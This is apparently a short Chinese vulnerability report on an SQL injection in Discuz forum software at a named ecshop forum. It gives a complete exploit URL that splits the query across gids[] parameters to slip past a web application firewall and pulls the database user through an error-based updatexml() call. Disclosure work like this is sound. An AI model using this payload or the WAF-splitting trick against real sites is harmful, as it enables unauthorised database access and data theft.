### 简要描述:
注入不是亮点,亮点在于绕过waf,专业绕waf,30年。
### 详细说明:
利用DZ本漏洞的特性,拆开sql语句。
http://bbs.ecshop.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and 1=(updatexml(1,concat(0x5e24,(/*
&gids[101][0]=*/select user/*
&gids[102][0]=*/()),0x5e24),1))%23
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg" alt="QQ截图20140703000300.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg)
暂无评论